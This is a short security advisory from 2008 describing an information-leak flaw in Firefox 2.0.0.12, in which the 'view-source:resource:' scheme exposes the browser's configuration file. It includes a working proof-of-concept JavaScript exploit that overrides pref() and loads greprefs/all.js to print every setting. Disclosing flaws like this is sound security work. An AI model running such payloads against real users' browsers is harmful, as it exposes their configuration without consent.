|
|
|
|
| |
| A vulnerability in Firefox allows remote attackers to enumerate all the configuration settings of the browser without requiring user authorization or interaction. |
| |
Credit:
The information has been provided by carl hardwick.
The original article can be found at: http://www.0x000000.com/
|
| |
Vulnerable Systems:
* Firefox version 2.0.0.12
In the vulnerability we make use of the 'view-source:' scheme that allows us to source out the 'resource:' scheme. With it, we can view the source of any file located in the 'resource:///' directory, which translates back to: file:///C:/Program Files/Mozilla Firefox/. Then we only include the file inside it and it becomes available to a new page's DOM, and so we are able to read all settings.
Other issues can emerge also, this is only a short-hand proof of concept. Like always, more is possible.
Exploit:
<script>
/*
@name: Firefox <= 2.0.0.12 information leak pOc
@date: Feb. 07 2008
@author: Ronald van den Heetkamp
@url: http://www.0x000000.com
*/
pref = function(a,b) {
document.write( a + ' -> ' + b + '<br />');
};
</script>
<script src="view-source:resource:///greprefs/all.js"></script>
|
|
|
|
|
